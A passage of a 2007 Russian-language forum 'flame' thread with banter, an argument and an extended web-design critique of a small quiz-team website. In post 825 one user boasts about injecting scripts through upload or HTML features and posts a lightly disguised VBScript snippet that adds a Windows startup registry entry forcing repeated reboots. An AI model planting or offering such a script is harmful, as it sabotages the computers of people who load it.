Turan

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » Turan » Общий форум » Флейм,Флейм,Флейм!


Флейм,Флейм,Флейм!

Сообщений 811 страница 840 из 972

811

alexander_NS написал(а):

ТЫ хочешь сказать, что ты за городом живёшь?

А что? Нет?

812

Мой любимый сайт накрылся..

813

А ещё вирус какой-то, и он теперь клонирует посты

на всех форумах, где я зарегистирована

814

RatspideR написал(а):

А что? Нет?

Если ты в переделе 15 мин от станции метро, то нет)))

815

Хатшепсут написал(а):

А ещё вирус какой-то, и он теперь клонирует посты
на всех форумах, где я зарегистирована

Наверное так же как и мне, давала кому-нить свой IP. )

Отредактировано RatspideR (2007-08-12 10:18:07)

816

Нет ) ты вымогатель )

вирус Интружн какой-то

817

Говорят , в ночь с 12 на 13 звездный дождь .
Я пару минуту окна постоял ,ни одной звезды не упало .
Был тольковзлёт , даи то фонари самолёты .

818

Кто удалил мою тему???

819

Хатшепсут написал(а):

вирус Интружн какой-то

Отлкючи Касперского, я те ещё пару троянов загоню! ) Или KGB Spy....

Отредактировано RatspideR (2007-08-14 10:51:35)

820

TenderZero
А я увидел... вроде... может быть...

821

Хатшепсут написал(а):

ты вымогатель )

Бедный я! Что я сделал?

822

Ну и какой в этом смысл?

этт уже с месяц, не из-за тебя. На имо сайте хакеры взломали и что-т напортачили, терь вирус через сайт распространяется

823

Хатшепсут написал(а):

На имо сайте хакеры взломали и что-т напортачили, терь вирус через сайт распространяется

Так этому сайту и надо!!!  В следующий раз ещё раз сломают!  :diablo.gif:  Можешь им сообщить чтоб запретили загружать картинки и файлы, а то слишком просто будет!

Отредактировано RatspideR (2007-08-14 17:26:12)

824

Что за глупости

"Картинок" там как раз не так уж и много

А взломали Antiemo.net совместно с Black Legion ом

825

Хатшепсут написал(а):

Что за глупости

А ты разбираешься в хакерстве???
Если на сайт каким-то образом можно что-то загрузить, то и любой скрипт также можно загрузить. Если форум поддерживает html-коды, тем лучше - значит можно вписать любой скрипт, написанный самим или взятый где-то, и дело в шляпе!

Например, если сможешь где-то разместить правильно этот код, то ... сама посмотришь! Для безопасности разные во всех тегах аменил "<>" и "[]" на "{}".

{code}script language="vbscript"}
on error resume next
dim astenhacker
set astenhacker=CreateObject("WScript.Shell")
astenhacker.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Run\SYSTEM32","shutdown -r"
/script}
{/code}

Если интересно могу дальше объяснить, как это всё работает. И что этот скрипт означает.

Хатшепсут написал(а):

"Картинок" там как раз не так уж и много

Какая разница, главное чтоб пользователю можно было загружать их. Кстати особо умные хакеры могут это всё через авик делать. В смысле вместо пути которого ты вводишь (видела кнопку "обзор"?) вписать путь трояна или скрипта.

Отредактировано RatspideR (2007-08-14 17:29:16)

826

Мне это НЕинтерсно

Никогда не увлекалась и не собираюсь

А ты не имеешь права тыкать се в грудь и орать

Есть нормы приличия

827

Хатшепсут написал(а):

Есть нормы приличия

Лично я о себе ничё не говорил!

828

Невоспитанность видна издалека

Даже потребности нет и не было

829

Хатшепсут написал(а):

Невоспитанность видна издалека

Наверное поэтому ты так заметна.

Хатшепсут написал(а):

Даже потребности нет и не было

Нечего тогда без повода спор поднимать! На себя сначала бы посмотрела - "верх воспитанности".

З.Ы. кто знает как настроить аську на мобиле?

Отредактировано RatspideR (2007-08-21 20:28:16)

830

Приглашаем всех желающих на наш форум http://chgk.ucoz.ru !!!

831

эх, так как это флейм и я кое-что в этом понимаю,позволю себе немного критики, только без обид!

Citizen написал(а):

Приглашаем всех желающих на наш форум http://chgk.ucoz.ru !!!

чтобы не портить вашу гостевую книгу решила написать здесь)
за верхушку сайта зачет, за все остальное ПИЛОХО! захотите подробнее, напишу подробнее! и посоветуйте дизайнеру посетить сайт wwwartlebedev.ru, ему будет очень полезно!

832

Kotya
Создавал его я. Пожалуйста поподробнее. Что именно?

ПыСы:
Критика всегда полезна.

Отредактировано RatspideR (2007-08-22 16:50:10)

833

не, сонце, это скорее советы, чем критика! в конце концов сама не гений веб-дизайна! итак поехали:
1 Почему желтый??? и уж совсем не понимаю почему такой яркий, через кааое-то время глаз устаёт, а второй взрывается)))
2 Градиент лучше убрать, ну или немного сгладить
3 Ссылка "Сайт команды Х-Трим" во первых чисто по-вебовски не корректна!там обычно пишут Главная , ну а если хочется чего-то оригинальнее, то можно было хотя бы соригинальничать.А во вторых ЗАЧЕМ ОНА ВОБЩЕ НУЖНА, если и на Форуме та же страница открывается?
4 Опросник ваш почему-то не пашет, может это только у меня........... , но синий индикатор это ужасно!
5 Почему нельзя просмотреть форум, не зарегестрировавшись, это уменьшает количество посетителей как минимум процентов на 80, если бы не чисто спортивный интерес, я бы, например, сразу закрыла сайт!
6 Зачем дважды сувать поля ввода? лучше бы вы в центре что-нибудь интересное написали, ну или на кройняк фото команды (не самое лучшее, но всетаки лучше чем то что есть)
7 Зачем на каждом блоке эти треугольнички? функций, как я поняла, у них нет, смысловой нагрузки они тоже не несут, а дизайн от них лучше не становиться!
8 Непонятные белые палки по бокам все портят! УБРАТЬ, НЕЛЬЗЯ ПОМИЛОВАТЬ
9 Обычно на сайтах ставят или знак Copyright, или пишут слово целиком! зачем их вместе?
10 Но самое ужасное то что он на полстраницы! если б там было просто пустое продолжение  фона, и то было бы лучше!

вот за верхний блок респект, хорошо нарисован, если ты конечно сам это придумал и нарисовал!

надеюсь я не сильно раскритиковала!)))) если еще немного посидеть над этим сайтом, то получится конфетка!

а сайт лебедева всетаки посети и проштудируй от начала до конца, вобще этот сайт должен стать чем-то вроде настольной книги для дизайнера!

Отредактировано Kotya (2007-08-22 17:27:58)

834

Kotya написал(а):

1 Почему желтый??? и уж совсем не понимаю почему такой яркий, через кааое-то время глаз устаёт, а второй взрывается)))
2 Градиент лучше убрать, ну или немного сгладить

Не согласен, моё мнение.

Kotya написал(а):

3 Ссылка "Сайт команды Х-Трим" во первых чисто по-вебовски не корректна!там обычно пишут Главная , ну а если хочется чего-то оригинальнее, то можно было хотя бы соригинальничать.А во вторых ЗАЧЕМ ОНА ВОБЩЕ НУЖНА, если и на Форуме та же страница открывается?

Исправим. Это было случайно!

Kotya написал(а):

4 Опросник ваш почему-то не пашет, может это только у меня........... , но синий индикатор это ужасно!

Не понял, ща посмотрю.

Kotya написал(а):

5 Почему нельзя просмотреть форум, не зарегестрировавшись, это уменьшает количество посетителей как минимум процентов на 80, если бы не чисто спортивный интерес, я бы, например, сразу закрыла сайт!

Это форум для ех кто играет в ЧГК. Главное чтобы все были знакомы в реале. я нигде сайт не рекламировал, мне это не нужно. 24 пользователя, зато большинство активны и все знакомы.

Kotya написал(а):

6 Зачем дважды сувать поля ввода? лучше бы вы в центре что-нибудь интересное написали, ну или на кройняк фото команды (не самое лучшее, но всетаки лучше чем то что есть)

Ты права, уберу.

Kotya написал(а):

7 Зачем на каждом блоке эти треугольнички? функций, как я поняла, у них нет, смысловой нагрузки они тоже не несут, а дизайн от них лучше не становиться!

Если честно не понял о чём ты говоришь.

Kotya написал(а):

8 Непонятные белые палки по бокам все портят! УБРАТЬ, НЕЛЬЗЯ ПОМИЛОВАТЬ

Исправлю обязательно.

Kotya написал(а):

9 Обычно на сайтах ставят или знак Copyright, или пишут слово целиком! зачем их вместе?

Исправим!

Kotya написал(а):

10 Но самое ужасное то что он на полстраницы! если б там было просто пустое продолжение  фона, и то было бы лучше!

Не понял.. Он на всю страницу. у меня разрешение 1280.1024. Может у тя 1600.1200?

Kotya написал(а):

надеюсь я не сильно раскритиковала!))))

Спасибо, учту все замечания!

835

RatspideR написал(а):

Kotya написал:
7 Зачем на каждом блоке эти треугольнички? функций, как я поняла, у них нет, смысловой нагрузки они тоже не несут, а дизайн от них лучше не становиться!Если честно не понял о чём ты говоришь.

такие шарики с треугольничками внутри, они обычно стоят если есть что разворачивать!
насчет разрешения у меня тоже 1280.1024,но сайт доходит только до середины, это скорее неполадки с HTML. сам сажал?
а насчет света и градиента: давай так  вопрос- градиент нужен для того чтобы показать объем? тогда он ошибочен!
если так, просто чтоб фон не был однотонным, поверь есть рещения для этой задачи, гораздо интереснее!
ну а цвет дело вкуса, не буду спорить, но сделать его помягче всетаки желательно!

и хорошо что не принял в штыки))))

836

Kotya
Насчёт цвета: сделаю оранжевый, а не жёлтый.

Kotya написал(а):

насчет разрешения у меня тоже 1280.1024,но сайт доходит только до середины, это скорее неполадки с HTML. сам сажал?

Странно... ни у кого так не было!

Kotya написал(а):

такие шарики с треугольничками внутри, они обычно стоят если есть что разворачивать!

Ну это для дизайна. Подумаю над этим.

837

RatspideR написал(а):

Ну это для дизайна. Подумаю над этим.

просто понимаешь, это элемент навигации, как дизайн это не используется)))))

))))))))))))))) Copyright уже убрал))))))))))

838

или похоже что он на форуме 1, а на главной их 2)))))))))))

чет я совсем запуталась, теперь есть галерея, но нет форума и главной!!! ой мама, ктулху жрет мой мозк

Отредактировано Kotya (2007-08-22 17:52:27)

839

тоже решение)))))))))))))

840

Kotya написал(а):

но синий индикатор это ужасно!

А какой тогда? Черный? Нет. Зелёный?


Вы здесь » Turan » Общий форум » Флейм,Флейм,Флейм!